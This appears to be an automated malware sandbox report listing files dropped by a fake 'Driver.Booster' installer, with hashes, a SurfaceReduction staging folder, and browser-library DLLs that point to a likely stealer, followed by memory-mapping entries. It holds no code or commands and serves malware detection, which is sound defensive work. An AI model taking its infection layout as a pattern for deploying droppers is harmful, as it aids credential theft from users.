SHA512edffac04d15bb0553f350bebac4db189612b5eb1fa341a5b51d4a083cf5e61ac5c2cdb76e0a2745f9dc16f39cc3495120ca913092815a64be9afe83daec36110
-
C:\ProgramData\SurfaceReduction\extracted\file_1.zipFilesize
70KB
MD5f976cefc05933a49ef0124a3c1b5bb53
SHA131dffada651cf25c39933df77a69da48e93ea201
SHA256bd76f7250f364a1a634b0fe9ebdba4df8cd07bb64cc3909a43c52cdad3e9a9d6
SHA512f336f53f6f294a46a4da87b7f3430168e531231c94269536d80f89ad386529a9ab8cb62970b61108640a6e13027ca5b1c522bdaad4ea767004eca025166c87e3
-
C:\ProgramData\SurfaceReduction\extracted\file_2.zipFilesize
71KB
MD5de6de50217b50de278d92b3220df5025
SHA1e3902560189af4f40de46c124b3c66aa39fe4b39
SHA256b6dbf33e9a5c6e4fb2fbc98af6e9755120f9246958b3017808869157540a969e
SHA51239755d41da3dc4158aa3f348bbf1b9587b14505e6eede5c2d384e19b17f9e1c0841bb0835ba6c5b981f8d0f4c579e61ab5bcb47d5ba9aef966838c9d68ac5d09
-
C:\ProgramData\SurfaceReduction\extracted\file_3.zipFilesize
71KB
MD5f824c0ea1cb9e31f38a674f21bdbd3a7
SHA122e4c331a85bb2ca63ac67f54f63985334776716
SHA2568b1059d50a1c22758e02a88a7ec885355839be9a07a9b6c6abfc764d64c45cb0
SHA512f0fe736337fab86f6ca8fdccdca2b85ce7e08133946150e81fabbafe8748f87c5424c7612a6525b9e7c0e72b65e78137ae7e92de4ef6f945824286ff1e1dfdd5
-
C:\ProgramData\SurfaceReduction\extracted\file_4.zipFilesize
71KB
MD56deb0383e5f9d4c75587492bfece0f7f
SHA17e69911d6ed6efb1ff448c0c52ea56b0099c1b5d
SHA2560d08adbbef248ab9a81ea9d5b0c203956ee1ba835df9ee11810a69a7e61205a0
SHA5120cb2e47d7f9cbb467ae3c366ea22de742ea51e9ab2336d67a591f2854d40748385be6838515ae5b3427e9efe8baf7be71ab3567cfc9727495372ca07d6ff7ff1
-
C:\ProgramData\SurfaceReduction\extracted\file_5.zipFilesize
71KB
MD577ce61f632dff13b895182086b19bd0f
SHA15fab5fba2eb42ab170f27217c8d19ee1c14827c1
SHA2569996355060dc9810ce54c8c322bd7e879fde50c8cac72bd1936600a54793c5af
SHA512db1671015df4c1e8509ce926002db262eb46563f569891636f4fc1050259063cba817a4cc179199c5485140bc73e5b1fb690592eb142437f0c7f6246dc888c74
-
C:\ProgramData\SurfaceReduction\extracted\file_6.zipFilesize
71KB
MD5bcb988f512d99ec790ab9198ebeb7440
SHA1a0a44acffc1a561b598ae663b9be6e01afafdbf4
SHA2561f93463d9667f533942d0bc0907ea511b8cab838cf0823e6c65c5f11d46a9b7d
SHA5128df93bd582b86546a1ffd48d6315f829dfb11c6a3c753f6000a96b562eea858ad1a9bbe30b63637a37e819165668e7ce187af787b88739dc0bac3b0fe0dc858e
-
C:\ProgramData\SurfaceReduction\extracted\file_7.zipFilesize
1.6MB
MD521eafd3d1330ed388119fbeb2480389f
SHA19bb8bec932a1119cc275fcddddd03295fae35f6a
SHA256f9a4741808125bc7e3e5bdda52d02c937d16693faedb899657c2d290a8406855
SHA512a79a7de9b457a91296b3b6a54057479fdbfc6482a77d085a4f8f50b52a1a04bf4cda7e6f7752d2e211c3258c52af23aee0274c92340e1e39e02d85b3ecad4861
-
C:\ProgramData\SurfaceReduction\extracted\rundll32.exeFilesize
141KB
MD586de72faa767618de4615edd808822ba
SHA171582fea7913fef4f61d0fbcae5440ac47f234c4
SHA256c2a133e566d533e6d7d43a587c047a09e5ef82fef7ec3f7661cb0ae5e502e709
SHA512c91ddc5f3edcbf3aeb5a4f229f03a667b8c363c3ac484efb67a3d24530a4aaa0882081e0ef0251b11780b406e735d2c0daf879545950c9d4def9f94f7146f943
-
C:\ProgramData\SurfaceReduction\file.binFilesize
1.6MB
MD51f303577283e48ffd1cca455dcd885f8
SHA122144c028e8641da505c9d75d1b60862d7d8f26f
SHA256733d2da68cd375dd4fb672d3b74b0c1f9dc5afaa6ecbc1ab4a88b9041c6d6a47
SHA512067696bd2db6b55326074fd1ea87c89eaec873b06a90780d3e40370591596449a5d19fdb254d94eb38da71679b52495621e3cdfe94030239e7c22ad91d2f9f2c
-
C:\ProgramData\SurfaceReduction\hfile.binFilesize
1.7MB
MD52510d838cbdec4744e9dadea34fd0ee8
SHA1eb89c3a7361bbd475bde58a4e74443f11cd8e163
SHA256ca6c79a6831c92f3254249f93ca3dd69d8d35c08f47312ba3fc8ea88c0594062
SHA51229a314a455fd401b3e95c511164e6b9979505e88a824736e4a6f0388f37b46f3e05ac2daa499bda3ef824956d1fafd5e2aec3a0f8481728f909ea718a3da4893
-
C:\ProgramData\SurfaceReduction\main.batFilesize
3KB
MD55b2234fcf37959a27fc5227645964d4f
SHA16d816bf84a4039e5ab901a9fa9d62522104c8ec5
SHA256b9b7844702e65899a28f04906674298d6ec14ade0bfc89c9a9bcb4cfb8633827
SHA51275c747c37a7aab9d59b260a7c1c9406d59feec76929b7288465f331f1eb8a563c213958653b666b833ed24f1545abdc57c8fe99fd49328c863758e6fef613f3b
-
C:\ProgramData\SurfaceReduction\rundll32.exeFilesize
141KB
MD586de72faa767618de4615edd808822ba
SHA171582fea7913fef4f61d0fbcae5440ac47f234c4
SHA256c2a133e566d533e6d7d43a587c047a09e5ef82fef7ec3f7661cb0ae5e502e709
SHA512c91ddc5f3edcbf3aeb5a4f229f03a667b8c363c3ac484efb67a3d24530a4aaa0882081e0ef0251b11780b406e735d2c0daf879545950c9d4def9f94f7146f943
-
C:\ProgramData\SurfaceReduction\rundll32.exeFilesize
141KB
MD586de72faa767618de4615edd808822ba
SHA171582fea7913fef4f61d0fbcae5440ac47f234c4
SHA256c2a133e566d533e6d7d43a587c047a09e5ef82fef7ec3f7661cb0ae5e502e709
SHA512c91ddc5f3edcbf3aeb5a4f229f03a667b8c363c3ac484efb67a3d24530a4aaa0882081e0ef0251b11780b406e735d2c0daf879545950c9d4def9f94f7146f943
-
C:\Users\Admin\AppData\Local\Temp\is-DQCVK.tmp\0b1c78db1d6debc91c59c0d7dfe9dd31.tmpFilesize
3.2MB
MD543aaf3e578e50127323c15d737e9b437
SHA186226c61bb6106737ed4fa925c66c250b32ecc4c
SHA2568b7c943d24cb32f16ba5c6ce634dfc5053ac1422f9f8441f0b54d9962bd0a1d0
SHA5127827bc09a5ad0e465892ab814bd2130abcf6ea1fde6686079cd2f43c5ec4dacc8b4fbc445bd2a0b95f9bc65fcf75a75a1ffd3f18e51789d37df0902ce1876643
-
C:\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exeFilesize
27.9MB
MD53212d281efcb3034bf3b55b2463c7c68
SHA14bd4fc215bf9f2aaed62a1049f3a0563236090e2
SHA256f3a4156ef45d8ce2e6dd9dfd9db9185ecc229a36b7ce10ef7611c14f8179abef
SHA5123dd45250c0398e04362ab9d466103f8b1bdcd697fd18f963d6ab5a4d06ee2c0c17495cee70684856da2aa407131cac75876d8286af355c60f081f44eca1bfe5d
-
C:\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exeFilesize
27.9MB
MD53212d281efcb3034bf3b55b2463c7c68
SHA14bd4fc215bf9f2aaed62a1049f3a0563236090e2
SHA256f3a4156ef45d8ce2e6dd9dfd9db9185ecc229a36b7ce10ef7611c14f8179abef
SHA5123dd45250c0398e04362ab9d466103f8b1bdcd697fd18f963d6ab5a4d06ee2c0c17495cee70684856da2aa407131cac75876d8286af355c60f081f44eca1bfe5d
-
C:\Users\Admin\AppData\Local\Temp\is-T53UA.tmp\Driver.Booster.10.0.0.31.tmpFilesize
1.2MB
MD5790761a71cb61ac50c7d04b3da72a167
SHA16558d25b86327810bf34f256fdf4dd94127992e2
SHA2568336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68
SHA51290b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD58d6605bb38fe50169bec67cf4d18eb01
SHA1d0450f2f829ddab5dd3457798aa5bf89280ae74f
SHA256363a13a255096a9423c6a9f1753d8b416bc151e8bbd6c562ee13dd6e914519fe
SHA5121c42743d85f9676223acb35cd6715240e7b032986d4f0dd40c605598f998e23623ea4991e6d1088e9ec27eb56c962408a2af8d48f0501785f47e26a30a902f5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD58d6605bb38fe50169bec67cf4d18eb01
SHA1d0450f2f829ddab5dd3457798aa5bf89280ae74f
SHA256363a13a255096a9423c6a9f1753d8b416bc151e8bbd6c562ee13dd6e914519fe
SHA5121c42743d85f9676223acb35cd6715240e7b032986d4f0dd40c605598f998e23623ea4991e6d1088e9ec27eb56c962408a2af8d48f0501785f47e26a30a902f5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD58d6605bb38fe50169bec67cf4d18eb01
SHA1d0450f2f829ddab5dd3457798aa5bf89280ae74f
SHA256363a13a255096a9423c6a9f1753d8b416bc151e8bbd6c562ee13dd6e914519fe
SHA5121c42743d85f9676223acb35cd6715240e7b032986d4f0dd40c605598f998e23623ea4991e6d1088e9ec27eb56c962408a2af8d48f0501785f47e26a30a902f5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD58d6605bb38fe50169bec67cf4d18eb01
SHA1d0450f2f829ddab5dd3457798aa5bf89280ae74f
SHA256363a13a255096a9423c6a9f1753d8b416bc151e8bbd6c562ee13dd6e914519fe
SHA5121c42743d85f9676223acb35cd6715240e7b032986d4f0dd40c605598f998e23623ea4991e6d1088e9ec27eb56c962408a2af8d48f0501785f47e26a30a902f5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD58d6605bb38fe50169bec67cf4d18eb01
SHA1d0450f2f829ddab5dd3457798aa5bf89280ae74f
SHA256363a13a255096a9423c6a9f1753d8b416bc151e8bbd6c562ee13dd6e914519fe
SHA5121c42743d85f9676223acb35cd6715240e7b032986d4f0dd40c605598f998e23623ea4991e6d1088e9ec27eb56c962408a2af8d48f0501785f47e26a30a902f5e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
\ProgramData\SurfaceReduction\rundll32.exeFilesize
141KB
MD586de72faa767618de4615edd808822ba
SHA171582fea7913fef4f61d0fbcae5440ac47f234c4
SHA256c2a133e566d533e6d7d43a587c047a09e5ef82fef7ec3f7661cb0ae5e502e709
SHA512c91ddc5f3edcbf3aeb5a4f229f03a667b8c363c3ac484efb67a3d24530a4aaa0882081e0ef0251b11780b406e735d2c0daf879545950c9d4def9f94f7146f943
-
\ProgramData\SurfaceReduction\rundll32.exeFilesize
141KB
MD586de72faa767618de4615edd808822ba
SHA171582fea7913fef4f61d0fbcae5440ac47f234c4
SHA256c2a133e566d533e6d7d43a587c047a09e5ef82fef7ec3f7661cb0ae5e502e709
SHA512c91ddc5f3edcbf3aeb5a4f229f03a667b8c363c3ac484efb67a3d24530a4aaa0882081e0ef0251b11780b406e735d2c0daf879545950c9d4def9f94f7146f943
-
\Users\Admin\AppData\LocalLow\mozglue.dllFilesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
\Users\Admin\AppData\LocalLow\nss3.dllFilesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
\Users\Admin\AppData\LocalLow\sqlite3.dllFilesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
\Users\Admin\AppData\Local\Temp\is-91L9E.tmp\_isetup\_shfoldr.dllFilesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
\Users\Admin\AppData\Local\Temp\is-91L9E.tmp\_isetup\_shfoldr.dllFilesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
\Users\Admin\AppData\Local\Temp\is-91L9E.tmp\b2p.dllFilesize
22KB
MD5ab35386487b343e3e82dbd2671ff9dab
SHA103591d07aea3309b631a7d3a6e20a92653e199b8
SHA256c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09
-
\Users\Admin\AppData\Local\Temp\is-91L9E.tmp\botva2.dllFilesize
37KB
MD567965a5957a61867d661f05ae1f4773e
SHA1f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b
-
\Users\Admin\AppData\Local\Temp\is-91L9E.tmp\iswin7logo.dllFilesize
39KB
MD51ea948aad25ddd347d9b80bef6df9779
SHA10be971e67a6c3b1297e572d97c14f74b05dafed3
SHA25630eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545
-
\Users\Admin\AppData\Local\Temp\is-DQCVK.tmp\0b1c78db1d6debc91c59c0d7dfe9dd31.tmpFilesize
3.2MB
MD543aaf3e578e50127323c15d737e9b437
SHA186226c61bb6106737ed4fa925c66c250b32ecc4c
SHA2568b7c943d24cb32f16ba5c6ce634dfc5053ac1422f9f8441f0b54d9962bd0a1d0
SHA5127827bc09a5ad0e465892ab814bd2130abcf6ea1fde6686079cd2f43c5ec4dacc8b4fbc445bd2a0b95f9bc65fcf75a75a1ffd3f18e51789d37df0902ce1876643
-
\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exeFilesize
27.9MB
MD53212d281efcb3034bf3b55b2463c7c68
SHA14bd4fc215bf9f2aaed62a1049f3a0563236090e2
SHA256f3a4156ef45d8ce2e6dd9dfd9db9185ecc229a36b7ce10ef7611c14f8179abef
SHA5123dd45250c0398e04362ab9d466103f8b1bdcd697fd18f963d6ab5a4d06ee2c0c17495cee70684856da2aa407131cac75876d8286af355c60f081f44eca1bfe5d
-
\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
\Users\Admin\AppData\Local\Temp\is-T53UA.tmp\Driver.Booster.10.0.0.31.tmpFilesize
1.2MB
MD5790761a71cb61ac50c7d04b3da72a167
SHA16558d25b86327810bf34f256fdf4dd94127992e2
SHA2568336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68
SHA51290b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3
-
memory/280-135-0x0000000072E40000-0x00000000733EB000-memory.dmpFilesize
5.7MB
-
memory/280-80-0x0000000000000000-mapping.dmp
-
memory/280-90-0x0000000072E40000-0x00000000733EB000-memory.dmpFilesize
5.7MB
-
memory/280-91-0x0000000072E40000-0x00000000733EB000-memory.dmpFilesize
5.7MB
-
memory/280-131-0x0000000000000000-mapping.dmp
-
memory/468-149-0x0000000000000000-mapping.dmp
-
memory/520-159-0x0000000000000000-mapping.dmp
-
memory/556-121-0x0000000000000000-mapping.dmp
-
memory/616-179-0x0000000000000000-mapping.dmp
-
memory/804-194-0x0000000008C60000-0x0000000008CF2000-memory.dmpFilesize
584KB
-
memory/804-188-0x0000000000800000-0x000000000082A000-memory.dmpFilesize
168KB
-
memory/804-185-0x0000000000000000-mapping.dmp
-
memory/804-193-0x0000000008860000-0x0000000008932000-memory.dmpFilesize
840KB
-
memory/860-63-0x0000000074141000-0x0000000074143000-memory.dmpFilesize
8KB
-
memory/860-58-0x0000000000000000-mapping.dmp
-
memory/904-112-0x0000000000000000-mapping.dmp
-
memory/904-142-0x0000000000000000-mapping.dmp
-
memory/904-146-0x0000000072E40000-0x00000000733EB000-memory.dmpFilesize
5.7MB
-
memory/908-119-0x0000000000000000-mapping.dmp
-
memory/948-221-0x0000000000000000-mapping.dmp
-
memory/980-126-0x0000000000000000-mapping.dmp
-
memory/1012-122-0x0000000000000000-mapping.dmp
-
memory/1016-110-0x0000000000000000-mapping.dmp
-
memory/1020-175-0x0000000000000000-mapping.dmp
-
memory/1032-192-0x0000000000000000-mapping.dmp
-
memory/1100-171-0x0000000000000000-mapping.dmp
-
memory/1108-115-0x0000000000000000-mapping.dmp
-
memory/1128-117-0x0000000000000000-mapping.dmp
-
memory/1140-152-0x0000000000000000-mapping.dmp
-
memory/1172-123-0x0000000000000000-mapping.dmp
-
memory/1220-127-0x0000000000000000-mapping.dmp
-
memory/1220-130-0x0000000072890000-0x0000000072E3B000-memory.dmpFilesize
5.7MB
-
memory/1232-116-0x0000000000000000-mapping.dmp
-
memory/1320-114-0x0000000000000000-mapping.dmp
-
memory/1336-205-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-211-0x0000000000408597-mapping.dmp
-
memory/1336-203-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-202-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-217-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-210-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-208-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-207-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1336-214-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1340-87-0x0000000000370000-0x0000000000373000-memory.dmpFilesize
12KB
-
memory/1340-86-0x0000000073E90000-0x0000000073EAB000-memory.dmpFilesize
108KB
-
memory/1340-222-0x0000000073E90000-0x0000000073EAB000-memory.dmpFilesize
108KB
-
memory/1340-85-0x0000000000610000-0x000000000061F000-memory.dmpFilesize
60KB
-
memory/1340-74-0x0000000000000000-mapping.dmp
-
memory/1340-141-0x0000000000370000-0x0000000000373000-memory.dmpFilesize
12KB
-
memory/1340-88-0x0000000073BB0000-0x0000000073BC1000-memory.dmpFilesize
68KB
-
memory/1364-118-0x0000000000000000-mapping.dmp
-
memory/1420-107-0x0000000000000000-mapping.dmp
-
memory/1428-89-0x0000000000400000-0x0000000000503000-memory.dmpFilesize
1.0MB
-
memory/1428-54-0x0000000075071000-0x0000000075073000-memory.dmpFilesize
8KB
-
memory/1428-55-0x0000000000400000-0x0000000000503000-memory.dmpFilesize
1.0MB
-
memory/1428-60-0x0000000000400000-0x0000000000503000-memory.dmpFilesize
1.0MB
-
memory/1428-125-0x0000000000000000-mapping.dmp
-
memory/1436-155-0x0000000000000000-mapping.dmp
-
memory/1480-96-0x0000000000000000-mapping.dmp
-
memory/1540-136-0x0000000000000000-mapping.dmp
-
memory/1540-140-0x0000000072890000-0x0000000072E3B000-memory.dmpFilesize
5.7MB
-
memory/1544-111-0x0000000000000000-mapping.dmp
-
memory/1544-191-0x0000000000000000-mapping.dmp
-
memory/1588-113-0x0000000000000000-mapping.dmp
-
memory/1660-104-0x0000000000000000-mapping.dmp
-
memory/1708-190-0x0000000000000000-mapping.dmp
-
memory/1744-163-0x0000000000000000-mapping.dmp
-
memory/1744-103-0x0000000000000000-mapping.dmp
-
memory/1748-198-0x000000006D530000-0x000000006DADB000-memory.dmpFilesize
5.7MB
-
memory/1748-106-0x0000000000000000-mapping.dmp
-
memory/1748-200-0x000000006D530000-0x000000006DADB000-memory.dmpFilesize
5.7MB
-
memory/1748-199-0x000000006D530000-0x000000006DADB000-memory.dmpFilesize
5.7MB
-
memory/1748-195-0x0000000000000000-mapping.dmp
-
memory/1756-120-0x0000000000000000-mapping.dmp
-
memory/1828-70-0x0000000000000000-mapping.dmp
-
memory/1836-148-0x0000000000000000-mapping.dmp
-
memory/1840-132-0x0000000000400000-0x000000000045F000-memory.dmpFilesize
380KB
-
memory/1840-72-0x0000000000400000-0x000000000045F000-memory.dmpFilesize
380KB
-
memory/1840-68-0x0000000000400000-0x000000000045F000-memory.dmpFilesize
380KB
-
memory/1840-65-0x0000000000000000-mapping.dmp
-
memory/1892-109-0x0000000000000000-mapping.dmp
-
memory/1960-100-0x0000000000000000-mapping.dmp
-
memory/2024-167-0x0000000000000000-mapping.dmp
-
memory/2028-124-0x0000000000000000-mapping.dmp
-
memory/2044-108-0x0000000000000000-mapping.dmp